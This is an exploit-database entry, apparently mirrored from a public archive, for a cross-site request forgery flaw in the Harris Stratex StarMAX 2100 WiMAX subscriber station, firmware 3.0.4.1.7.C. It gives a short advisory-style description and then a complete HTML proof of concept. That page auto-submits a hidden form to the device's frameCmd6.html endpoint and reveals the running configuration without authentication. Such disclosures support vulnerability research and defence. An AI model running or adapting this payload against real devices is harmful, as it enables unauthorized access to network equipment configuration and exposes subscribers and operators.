[] NeoSense
E X P L O I T S
title author type platform port cve id

Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery

Author: kalyanakumar
type: webapps
platform: hardware
port: 
date_added: 2010-07-07 
date_updated: 2010-07-07 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
I found CSRF vulnerability in Harris Stratex WIMAX 2100 subscriber
station.Using this code i am able to view the current configuration of the
subscriber station without authentication from both LAN & WAN

# Software Link:http://securityvulns.com/Wdocument736.html
# Version: 3.0.4.1.7.C
# Tested on: Any os
# CVE : No

Product :StarMAX 2100 WIMAX subscriber station
Affected Application Version: 3.0.4.1.7.C
Vendor submission:07-04-2009
Vendor Response:No
Vulnerability:Able to view the running configuration without authentication
from both LAN & WAN

<html>
<body>
<body onload="config.submit();">
<form name=config method="get" action="http:192.168.1.1/frameCmd6.html">
<input type=hidden name=showRunConfig value="Current Configuration">
</form>
</body>
</html>


Thanks
Kalyan
Security researcher
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.